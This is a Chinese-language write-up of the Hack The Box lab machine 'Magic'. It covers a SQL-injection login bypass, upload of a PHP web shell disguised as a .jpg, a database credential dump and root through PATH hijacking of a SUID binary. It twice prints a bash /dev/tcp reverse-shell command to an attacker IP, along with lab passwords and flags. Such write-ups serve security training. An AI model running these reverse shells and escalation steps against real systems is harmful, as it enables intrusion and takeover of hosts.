Recon

Nmap Scan

[toc]Nmap显示就开放Web和SSH端口,全端口扫描结果想同。故从Web端口入手。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.80 scan initiated Wed May 27 11:54:13 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 27 11:54:33 2020 -- 1 IP address (1 host up) scanned in 19.90 seconds

FootHold

  1. 访问Web端口和发现存在登录页面,显示语言为PHP。提示我们登陆成功后执行上传图片,根据这篇文章提供的登录SQL INJECTION绕过方法,可以绕过。以admin的身份登录成功。

  2. 登录成功后使用Github上的这个JPEG-SHELL,下载到本地后更改文件名称为444.php.jpg,上传成功。

  3. 访问http://10.10.10.185/images/uploads/444.php.jpg后执行以下命令获得reverse shell

1
bash -c 'bash -i >& /dev/tcp/10.10.14.184/1337 0>&1'
1
2
3
4
5
6
7
8
9
10
11
12
13
~/Documents/HTB/Magic root@kali 1m 30s
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:33954.
bash: cannot set terminal process group (1176): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/Magic/images/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/www/Magic/images/uploads$

User.txt

检查Web目录下,发现有含有数据库密码的文件db.php5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

但是发现没有安装mysql,但是发现安装了mysqldump,所以我们可以使用mysqldump来dump数据库。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@ubuntu:/var/www$ mysql
mysql_config_editor        mysqld
mysql_embedded             mysqld_multi
mysql_install_db           mysqld_safe
mysql_plugin               mysqldump
mysql_secure_installation  mysqldumpslow
mysql_ssl_rsa_setup        mysqlimport
mysql_tzinfo_to_sql        mysqloptimize
mysql_upgrade              mysqlpump
mysqladmin                 mysqlrepair
mysqlanalyze               mysqlreport
mysqlbinlog                mysqlshow
mysqlcheck                 mysqlslap
www-data@ubuntu:/var/www$ mysql

在dump的内容中找到用户admin的密码Th3s3usW4sK1ng

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
www-data@ubuntu:/var/www$ mysqldump -u theseus -p --all-databases
Enter password:
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database:
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-27  2:06:18

发现因为限制了SSH-KEY登录,不能用密码登录,所以我们用su - theseus,切换用户,获得user.txt。

1
2
3
4
5
www-data@ubuntu:/var/www$ su - theseus
Password: 
theseus@ubuntu:~$ cat user.txt 
556ec41c2135e5f95771baf818d441c9
theseus@ubuntu:~$

Privilege Escalation

我们往.ssh里写入ssh-key,这样我们就可以获得完整的shell了。 写入之后执行LinPEAS.sh,发现在/bin/sysinfo我们可以root身份运行。

1
2
[+] Readable files belonging to root and readable by me but not world readable                                                                                                                                                             
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo

用strings检查后,发现其中有很多命令没有填写绝对路径

1
2
3
4
5
6
7
8
9
10
11
12
theseus@ubuntu:/dev/shm$ strings /bin/sysinfo
...
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
...

我们只需要在可写入的文件夹下创建名为cat或者其他的reverse shell code,并将当前文件夹添加至环境变量中This Link,我们即可在执行/bin/sysinfo的时候拿到reverse shell。

1
2
3
4
theseus@ubuntu:/dev/shm$ cat cat
bash -c 'bash -i >& /dev/tcp/10.10.14.184/1337 0>&1'
theseus@ubuntu:/dev/shm$ export PATH=.:$PATH
theseus@ubuntu:/dev/shm$ /bin/sysinfo

拿到root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~/Documents/HTB/Magic root@kali
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:33960.
root@ubuntu:/dev/shm# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@ubuntu:/dev/shm# cd /root
cd /root
root@ubuntu:/root# cat root.txt
cat root.txt 
917f1d32c279b84c6fb40428ebe17192
root@ubuntu:/root#